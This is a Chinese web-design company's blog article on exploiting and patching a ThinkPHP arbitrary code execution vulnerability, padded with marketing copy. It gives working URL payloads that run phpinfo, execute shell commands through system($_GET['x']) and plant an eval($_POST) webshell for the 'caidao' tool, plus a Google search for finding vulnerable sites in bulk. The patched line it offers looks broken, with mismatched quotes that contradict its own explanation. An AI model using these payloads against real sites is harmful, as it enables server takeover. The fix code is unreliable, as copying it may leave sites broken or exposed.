这篇文章主要讲解了“如何利用及修复ThinkPHP框架任意代码执行漏洞”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何利用及修复ThinkPHP框架任意代码执行漏洞”吧!
创新互联公司服务项目包括久治网站建设、久治网站制作、久治网页制作以及久治网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,久治网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到久治省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!近期thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出网站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接执行一句话代码,用菜刀直接连接.
这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
thinkphp框架执行任意代码漏洞修复方法:
用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
感谢各位的阅读,以上就是“如何利用及修复ThinkPHP框架任意代码执行漏洞”的内容了,经过本文的学习后,相信大家对如何利用及修复ThinkPHP框架任意代码执行漏洞这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联网站建设公司,,小编将为大家推送更多相关知识点的文章,欢迎关注!
售后响应及时
7×24小时客服热线数据备份
更安全、更高效、更稳定价格公道精准
项目经理精准报价不弄虚作假合作无风险
重合同讲信誉,无效全额退款